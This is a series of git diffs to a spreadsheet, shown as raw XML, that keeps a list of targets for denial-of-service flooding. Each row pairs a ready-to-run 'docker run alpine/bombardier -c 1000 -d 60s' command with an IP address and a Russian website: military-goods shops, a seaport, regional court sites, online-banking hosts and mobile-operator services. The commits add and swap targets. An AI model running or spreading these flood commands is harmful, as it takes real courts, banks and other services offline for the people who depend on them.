     <row r="9" ht="14.6" customHeight="1">
-      <c r="A9" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B9&amp;" &amp;&amp; sleep 5;"</f>
-        <v>23</v>
-      </c>
-      <c r="B9" t="s" s="2">
-        <v>24</v>
-      </c>
-      <c r="C9" t="s" s="2">
-        <v>25</v>
-      </c>
+      <c r="A9" s="2"/>
+      <c r="B9" s="2"/>
+      <c r="C9" s="2"/>
       <c r="D9" s="3"/>
       <c r="E9" s="3"/>
     </row>
     <row r="10" ht="14.6" customHeight="1">
-      <c r="A10" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B10&amp;" &amp;&amp; sleep 5;"</f>
-        <v>26</v>
-      </c>
-      <c r="B10" t="s" s="2">
-        <v>27</v>
-      </c>
-      <c r="C10" t="s" s="2">
-        <v>28</v>
-      </c>
+      <c r="A10" s="2"/>
+      <c r="B10" s="2"/>
+      <c r="C10" s="2"/>
       <c r="D10" s="3"/>
       <c r="E10" s="3"/>
     </row>
     <row r="11" ht="14.6" customHeight="1">
-      <c r="A11" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B11&amp;" &amp;&amp; sleep 5;"</f>
-        <v>29</v>
-      </c>
-      <c r="B11" t="s" s="2">
-        <v>30</v>
-      </c>
-      <c r="C11" t="s" s="2">
-        <v>31</v>
-      </c>
+      <c r="A11" s="2"/>
+      <c r="B11" s="2"/>
+      <c r="C11" s="2"/>
       <c r="D11" s="3"/>
       <c r="E11" s="3"/>
     </row>
     <row r="12" ht="14.6" customHeight="1">
-      <c r="A12" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B12&amp;" &amp;&amp; sleep 5;"</f>
-        <v>32</v>
-      </c>
-      <c r="B12" t="s" s="2">
-        <v>33</v>
-      </c>
-      <c r="C12" t="s" s="2">
-        <v>34</v>
-      </c>
+      <c r="A12" s="2"/>
+      <c r="B12" s="2"/>
+      <c r="C12" s="2"/>
       <c r="D12" s="3"/>
       <c r="E12" s="3"/>
     </row>
     <row r="13" ht="14.6" customHeight="1">
-      <c r="A13" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B13&amp;" &amp;&amp; sleep 5;"</f>
-        <v>35</v>
-      </c>
-      <c r="B13" t="s" s="2">
-        <v>36</v>
-      </c>
-      <c r="C13" t="s" s="2">
-        <v>37</v>
-      </c>
+      <c r="A13" s="2"/>
+      <c r="B13" s="2"/>
+      <c r="C13" s="2"/>
       <c r="D13" s="3"/>
       <c r="E13" s="3"/>
     </row>
     <row r="14" ht="14.6" customHeight="1">
-      <c r="A14" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B14&amp;" &amp;&amp; sleep 5;"</f>
-        <v>38</v>
-      </c>
-      <c r="B14" t="s" s="2">
-        <v>39</v>
-      </c>
-      <c r="C14" t="s" s="2">
-        <v>37</v>
-      </c>
+      <c r="A14" s="2"/>
+      <c r="B14" s="2"/>
+      <c r="C14" s="2"/>
       <c r="D14" s="3"/>
       <c r="E14" s="3"/>
     </row>
     <row r="15" ht="14.6" customHeight="1">
-      <c r="A15" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B15&amp;" &amp;&amp; sleep 5;"</f>
-        <v>40</v>
-      </c>
-      <c r="B15" t="s" s="2">
-        <v>41</v>
-      </c>
-      <c r="C15" t="s" s="2">
-        <v>37</v>
-      </c>
+      <c r="A15" s="2"/>
+      <c r="B15" s="2"/>
+      <c r="C15" s="2"/>
       <c r="D15" s="3"/>
       <c r="E15" s="3"/>
     </row>
     <row r="16" ht="14.6" customHeight="1">
-      <c r="A16" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B16&amp;" &amp;&amp; sleep 5;"</f>
-        <v>42</v>
-      </c>
-      <c r="B16" t="s" s="2">
-        <v>43</v>
-      </c>
-      <c r="C16" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A16" s="2"/>
+      <c r="B16" s="2"/>
+      <c r="C16" s="2"/>
       <c r="D16" s="3"/>
       <c r="E16" s="3"/>
     </row>
     <row r="17" ht="14.6" customHeight="1">
-      <c r="A17" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B17&amp;" &amp;&amp; sleep 5;"</f>
-        <v>45</v>
-      </c>
-      <c r="B17" t="s" s="2">
-        <v>46</v>
-      </c>
-      <c r="C17" t="s" s="2">
-        <v>47</v>
-      </c>
+      <c r="A17" s="2"/>
+      <c r="B17" s="2"/>
+      <c r="C17" s="2"/>
       <c r="D17" s="3"/>
       <c r="E17" s="3"/>
     </row>
     <row r="18" ht="14.6" customHeight="1">
-      <c r="A18" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B18&amp;" &amp;&amp; sleep 5;"</f>
-        <v>48</v>
-      </c>
-      <c r="B18" t="s" s="2">
-        <v>49</v>
-      </c>
-      <c r="C18" t="s" s="2">
-        <v>50</v>
-      </c>
+      <c r="A18" s="2"/>
+      <c r="B18" s="2"/>
+      <c r="C18" s="2"/>
       <c r="D18" s="3"/>
       <c r="E18" s="3"/>
     </row>
     <row r="19" ht="14.6" customHeight="1">
-      <c r="A19" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B19&amp;" &amp;&amp; sleep 5;"</f>
-        <v>51</v>
-      </c>
-      <c r="B19" t="s" s="2">
-        <v>52</v>
-      </c>
-      <c r="C19" t="s" s="2">
-        <v>53</v>
-      </c>
+      <c r="A19" s="2"/>
+      <c r="B19" s="2"/>
+      <c r="C19" s="2"/>
       <c r="D19" s="3"/>
       <c r="E19" s="3"/>
     </row>
     <row r="20" ht="14.6" customHeight="1">
-      <c r="A20" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B20&amp;" &amp;&amp; sleep 5;"</f>
-        <v>54</v>
-      </c>
-      <c r="B20" t="s" s="2">
-        <v>55</v>
-      </c>
-      <c r="C20" t="s" s="2">
-        <v>56</v>
-      </c>
+      <c r="A20" s="2"/>
+      <c r="B20" s="2"/>
+      <c r="C20" s="2"/>
       <c r="D20" s="3"/>
       <c r="E20" s="3"/>
     </row>
     <row r="21" ht="14.6" customHeight="1">
-      <c r="A21" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B21&amp;" &amp;&amp; sleep 5;"</f>
-        <v>57</v>
-      </c>
-      <c r="B21" t="s" s="2">
-        <v>58</v>
-      </c>
-      <c r="C21" t="s" s="2">
-        <v>59</v>
-      </c>
+      <c r="A21" s="2"/>
+      <c r="B21" s="2"/>
+      <c r="C21" s="2"/>
       <c r="D21" s="3"/>
       <c r="E21" s="3"/>
     </row>
     <row r="22" ht="14.6" customHeight="1">
-      <c r="A22" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B22&amp;" &amp;&amp; sleep 5;"</f>
-        <v>60</v>
-      </c>
-      <c r="B22" t="s" s="2">
-        <v>61</v>
-      </c>
-      <c r="C22" t="s" s="2">
-        <v>62</v>
-      </c>
+      <c r="A22" s="2"/>
+      <c r="B22" s="2"/>
+      <c r="C22" s="2"/>
       <c r="D22" s="3"/>
       <c r="E22" s="3"/>
     </row>
     <row r="23" ht="14.6" customHeight="1">
-      <c r="A23" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B23&amp;" &amp;&amp; sleep 5;"</f>
-        <v>63</v>
-      </c>
-      <c r="B23" t="s" s="2">
-        <v>64</v>
-      </c>
-      <c r="C23" t="s" s="2">
-        <v>65</v>
-      </c>
+      <c r="A23" s="2"/>
+      <c r="B23" s="2"/>
+      <c r="C23" s="2"/>
       <c r="D23" s="3"/>
       <c r="E23" s="3"/>
     </row>
     <row r="24" ht="14.6" customHeight="1">
-      <c r="A24" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B24&amp;" &amp;&amp; sleep 5;"</f>
-        <v>66</v>
-      </c>
-      <c r="B24" t="s" s="2">
-        <v>67</v>
-      </c>
-      <c r="C24" t="s" s="2">
-        <v>68</v>
-      </c>
+      <c r="A24" s="2"/>
+      <c r="B24" s="2"/>
+      <c r="C24" s="2"/>
       <c r="D24" s="3"/>
       <c r="E24" s="3"/>
     </row>
     <row r="25" ht="14.6" customHeight="1">
-      <c r="A25" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B25&amp;" &amp;&amp; sleep 5;"</f>
-        <v>69</v>
-      </c>
-      <c r="B25" t="s" s="2">
-        <v>70</v>
-      </c>
-      <c r="C25" t="s" s="2">
-        <v>71</v>
-      </c>
+      <c r="A25" s="2"/>
+      <c r="B25" s="2"/>
+      <c r="C25" s="2"/>
       <c r="D25" s="3"/>
       <c r="E25" s="3"/>
     </row>
     <row r="26" ht="14.6" customHeight="1">
-      <c r="A26" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B26&amp;" &amp;&amp; sleep 5;"</f>
-        <v>72</v>
-      </c>
-      <c r="B26" t="s" s="2">
-        <v>73</v>
-      </c>
-      <c r="C26" t="s" s="2">
-        <v>74</v>
-      </c>
+      <c r="A26" s="2"/>
+      <c r="B26" s="2"/>
+      <c r="C26" s="2"/>
       <c r="D26" s="3"/>
       <c r="E26" s="3"/>
     </row>
     <row r="27" ht="14.6" customHeight="1">
-      <c r="A27" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B27&amp;" &amp;&amp; sleep 5;"</f>
-        <v>17</v>
-      </c>
-      <c r="B27" t="s" s="2">
-        <v>18</v>
-      </c>
-      <c r="C27" t="s" s="2">
-        <v>75</v>
-      </c>
+      <c r="A27" s="2"/>
+      <c r="B27" s="2"/>
+      <c r="C27" s="2"/>
       <c r="D27" s="3"/>
       <c r="E27" s="3"/>
     </row>
     <row r="28" ht="14.6" customHeight="1">
-      <c r="A28" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B28&amp;" &amp;&amp; sleep 5;"</f>
-        <v>76</v>
-      </c>
-      <c r="B28" t="s" s="2">
-        <v>77</v>
-      </c>
-      <c r="C28" t="s" s="2">
-        <v>78</v>
-      </c>
+      <c r="A28" s="2"/>
+      <c r="B28" s="2"/>
+      <c r="C28" s="2"/>
       <c r="D28" s="3"/>
       <c r="E28" s="3"/>
     </row>
     <row r="29" ht="14.6" customHeight="1">
-      <c r="A29" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B29&amp;" &amp;&amp; sleep 5;"</f>
-        <v>79</v>
-      </c>
-      <c r="B29" t="s" s="2">
-        <v>80</v>
-      </c>
-      <c r="C29" t="s" s="2">
-        <v>78</v>
-      </c>
+      <c r="A29" s="2"/>
+      <c r="B29" s="2"/>
+      <c r="C29" s="2"/>
       <c r="D29" s="3"/>
       <c r="E29" s="3"/>
     </row>
     <row r="30" ht="14.6" customHeight="1">
-      <c r="A30" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B30&amp;" &amp;&amp; sleep 5;"</f>
-        <v>81</v>
-      </c>
-      <c r="B30" t="s" s="2">
-        <v>82</v>
-      </c>
-      <c r="C30" t="s" s="2">
-        <v>78</v>
-      </c>
+      <c r="A30" s="2"/>
+      <c r="B30" s="2"/>
+      <c r="C30" s="2"/>
       <c r="D30" s="3"/>
       <c r="E30" s="3"/>
     </row>
@@ -1868,6 +1579,15 @@
       <c r="E31" s="3"/>
     </row>
   </sheetData>
+  <hyperlinks>
+    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="военсбыт.рф"/>
+    <hyperlink ref="C2" r:id="rId2" location="" tooltip="" display="www.voentorg-moscow.ru"/>
+    <hyperlink ref="C3" r:id="rId3" location="" tooltip="" display="hakki.ru"/>
+    <hyperlink ref="C4" r:id="rId4" location="" tooltip="" display="militarka.com"/>
+    <hyperlink ref="C5" r:id="rId5" location="" tooltip="" display="voentorg-sklad.ru"/>
+    <hyperlink ref="C6" r:id="rId6" location="" tooltip="" display="voen-torg.ru"/>
+    <hyperlink ref="C7" r:id="rId7" location="" tooltip="" display="voentorg-2.ru"/>
+  </hyperlinks>
   <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,41 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="21">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.235 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>31.31.196.235</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>военсбыт.рф</t>
-    </r>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.208.1.102 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.208.1.102</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>www.voentorg-moscow.ru</t>
-    </r>
-  </si>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="40">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.127.241.214 &amp;&amp; sleep 5;</t>
   </si>
@@ -53,15 +19,7 @@
     <t>188.127.241.214</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>hakki.ru</t>
-    </r>
+    <t>hakki.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.183.14.26 &amp;&amp; sleep 5;</t>
@@ -70,15 +28,7 @@
     <t>95.183.14.26</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>militarka.com</t>
-    </r>
+    <t>militarka.com</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.170.244.247  &amp;&amp; sleep 5;</t>
@@ -87,15 +37,7 @@
     <t xml:space="preserve">178.170.244.247 </t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>voentorg-sklad.ru</t>
-    </r>
+    <t>voentorg-sklad.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.252.141.29 &amp;&amp; sleep 5;</t>
@@ -104,15 +46,7 @@
     <t>84.252.141.29</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>voen-torg.ru</t>
-    </r>
+    <t>voen-torg.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.137.210.66 &amp;&amp; sleep 5;</t>
@@ -121,15 +55,82 @@
     <t>79.137.210.66</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="11"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>voentorg-2.ru</t>
-    </r>
+    <t>voentorg-2.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.130.41.33 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>45.130.41.33</t>
+  </si>
+  <si>
+    <t>sktatflot.ru/</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.222.40.105 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.222.40.105</t>
+  </si>
+  <si>
+    <t>www.morport-sochi.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.111.139 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>84.42.111.139</t>
+  </si>
+  <si>
+    <t>orenburgsky.orb.sudrf.ru</t>
+  </si>
+  <si>
+    <t>usd.orb.sudrf.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.83.234  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">92.53.83.234 </t>
+  </si>
+  <si>
+    <t>databank.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.198.68.51  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">91.198.68.51 </t>
+  </si>
+  <si>
+    <t>online.databank.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.252  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">213.5.80.252 </t>
+  </si>
+  <si>
+    <t>gebank.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.161  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">213.5.80.161 </t>
+  </si>
+  <si>
+    <t>ib.gebank.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.5.80.137 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.5.80.137</t>
+  </si>
+  <si>
+    <t>ibank.gebank.ru</t>
   </si>
 </sst>
 </file>
@@ -139,7 +140,7 @@
   <numFmts count="1">
     <numFmt numFmtId="0" formatCode="General"/>
   </numFmts>
-  <fonts count="4">
+  <fonts count="3">
     <font>
       <sz val="11"/>
       <color indexed="8"/>
@@ -154,12 +155,6 @@
       <sz val="15"/>
       <color indexed="8"/>
       <name val="Calibri"/>
-    </font>
-    <font>
-      <u val="single"/>
-      <sz val="11"/>
-      <color indexed="11"/>
-      <name val="Arial"/>
     </font>
   </fonts>
   <fills count="3">
@@ -237,7 +232,6 @@
       <rgbColor rgb="ff000000"/>
       <rgbColor rgb="ffffffff"/>
       <rgbColor rgb="ffaaaaaa"/>
-      <rgbColor rgb="ff0000ff"/>
     </indexedColors>
   </colors>
 </styleSheet>
@@ -1411,51 +1405,100 @@
       <c r="E7" s="3"/>
     </row>
     <row r="8" ht="14.6" customHeight="1">
-      <c r="A8" s="2"/>
-      <c r="B8" s="2"/>
-      <c r="C8" s="2"/>
+      <c r="A8" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B8&amp;" &amp;&amp; sleep 5;"</f>
+        <v>21</v>
+      </c>
+      <c r="B8" t="s" s="2">
+        <v>22</v>
+      </c>
+      <c r="C8" t="s" s="2">
+        <v>23</v>
+      </c>
       <c r="D8" s="3"/>
       <c r="E8" s="3"/>
     </row>
     <row r="9" ht="14.6" customHeight="1">
-      <c r="A9" s="2"/>
-      <c r="B9" s="2"/>
-      <c r="C9" s="2"/>
+      <c r="A9" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B9&amp;" &amp;&amp; sleep 5;"</f>
+        <v>21</v>
+      </c>
+      <c r="B9" t="s" s="2">
+        <v>22</v>
+      </c>
+      <c r="C9" t="s" s="2">
+        <v>24</v>
+      </c>
       <c r="D9" s="3"/>
       <c r="E9" s="3"/>
     </row>
     <row r="10" ht="14.6" customHeight="1">
-      <c r="A10" s="2"/>
-      <c r="B10" s="2"/>
-      <c r="C10" s="2"/>
+      <c r="A10" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B10&amp;" &amp;&amp; sleep 5;"</f>
+        <v>25</v>
+      </c>
+      <c r="B10" t="s" s="2">
+        <v>26</v>
+      </c>
+      <c r="C10" t="s" s="2">
+        <v>27</v>
+      </c>
       <c r="D10" s="3"/>
       <c r="E10" s="3"/>
     </row>
     <row r="11" ht="14.6" customHeight="1">
-      <c r="A11" s="2"/>
-      <c r="B11" s="2"/>
-      <c r="C11" s="2"/>
+      <c r="A11" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B11&amp;" &amp;&amp; sleep 5;"</f>
+        <v>28</v>
+      </c>
+      <c r="B11" t="s" s="2">
+        <v>29</v>
+      </c>
+      <c r="C11" t="s" s="2">
+        <v>30</v>
+      </c>
       <c r="D11" s="3"/>
       <c r="E11" s="3"/>
     </row>
     <row r="12" ht="14.6" customHeight="1">
-      <c r="A12" s="2"/>
-      <c r="B12" s="2"/>
-      <c r="C12" s="2"/>
+      <c r="A12" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B12&amp;" &amp;&amp; sleep 5;"</f>
+        <v>31</v>
+      </c>
+      <c r="B12" t="s" s="2">
+        <v>32</v>
+      </c>
+      <c r="C12" t="s" s="2">
+        <v>33</v>
+      </c>
       <c r="D12" s="3"/>
       <c r="E12" s="3"/>
     </row>
     <row r="13" ht="14.6" customHeight="1">
-      <c r="A13" s="2"/>
-      <c r="B13" s="2"/>
-      <c r="C13" s="2"/>
+      <c r="A13" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B13&amp;" &amp;&amp; sleep 5;"</f>
+        <v>34</v>
+      </c>
+      <c r="B13" t="s" s="2">
+        <v>35</v>
+      </c>
+      <c r="C13" t="s" s="2">
+        <v>36</v>
+      </c>
       <c r="D13" s="3"/>
       <c r="E13" s="3"/>
     </row>
     <row r="14" ht="14.6" customHeight="1">
-      <c r="A14" s="2"/>
-      <c r="B14" s="2"/>
-      <c r="C14" s="2"/>
+      <c r="A14" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B14&amp;" &amp;&amp; sleep 5;"</f>
+        <v>37</v>
+      </c>
+      <c r="B14" t="s" s="2">
+        <v>38</v>
+      </c>
+      <c r="C14" t="s" s="2">
+        <v>39</v>
+      </c>
       <c r="D14" s="3"/>
       <c r="E14" s="3"/>
     </row>
@@ -1579,15 +1622,6 @@
       <c r="E31" s="3"/>
     </row>
   </sheetData>
-  <hyperlinks>
-    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="военсбыт.рф"/>
-    <hyperlink ref="C2" r:id="rId2" location="" tooltip="" display="www.voentorg-moscow.ru"/>
-    <hyperlink ref="C3" r:id="rId3" location="" tooltip="" display="hakki.ru"/>
-    <hyperlink ref="C4" r:id="rId4" location="" tooltip="" display="militarka.com"/>
-    <hyperlink ref="C5" r:id="rId5" location="" tooltip="" display="voentorg-sklad.ru"/>
-    <hyperlink ref="C6" r:id="rId6" location="" tooltip="" display="voen-torg.ru"/>
-    <hyperlink ref="C7" r:id="rId7" location="" tooltip="" display="voentorg-2.ru"/>
-  </hyperlinks>
   <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,7 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="40">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="39">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.127.241.214 &amp;&amp; sleep 5;</t>
   </si>
@@ -49,43 +49,40 @@
     <t>voen-torg.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.137.210.66 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>79.137.210.66</t>
-  </si>
-  <si>
-    <t>voentorg-2.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.130.41.33 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>45.130.41.33</t>
-  </si>
-  <si>
-    <t>sktatflot.ru/</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.222.40.105 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>77.222.40.105</t>
-  </si>
-  <si>
-    <t>www.morport-sochi.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.111.139 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.42.111.139</t>
-  </si>
-  <si>
-    <t>orenburgsky.orb.sudrf.ru</t>
-  </si>
-  <si>
-    <t>usd.orb.sudrf.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.162.60.199 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.162.60.199</t>
+  </si>
+  <si>
+    <t>plus.megafon.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.168.27  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">193.232.168.27 </t>
+  </si>
+  <si>
+    <t>money.megafon.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.227.73.6 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.227.73.6</t>
+  </si>
+  <si>
+    <t>kiozk.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.168.26 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.232.168.26</t>
+  </si>
+  <si>
+    <t>books.megafon.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.83.234  &amp;&amp; sleep 5;</t>
@@ -171,7 +168,7 @@
       </patternFill>
     </fill>
   </fills>
-  <borders count="2">
+  <borders count="9">
     <border>
       <left/>
       <right/>
@@ -194,13 +191,86 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color indexed="10"/>
+      </left>
+      <right/>
+      <top style="thin">
+        <color indexed="10"/>
+      </top>
+      <bottom style="thin">
+        <color indexed="10"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right/>
+      <top style="thin">
+        <color indexed="10"/>
+      </top>
+      <bottom/>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color indexed="10"/>
+      </right>
+      <top style="thin">
+        <color indexed="10"/>
+      </top>
+      <bottom/>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color indexed="10"/>
+      </left>
+      <right/>
+      <top/>
+      <bottom/>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color indexed="10"/>
+      </right>
+      <top/>
+      <bottom/>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color indexed="10"/>
+      </left>
+      <right/>
+      <top/>
+      <bottom style="thin">
+        <color indexed="10"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color indexed="10"/>
+      </right>
+      <top/>
+      <bottom style="thin">
+        <color indexed="10"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
   </cellStyleXfs>
-  <cellXfs count="4">
+  <cellXfs count="11">
     <xf numFmtId="0" fontId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
@@ -211,6 +281,27 @@
       <alignment vertical="bottom"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="2" borderId="1" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="2" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="3" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
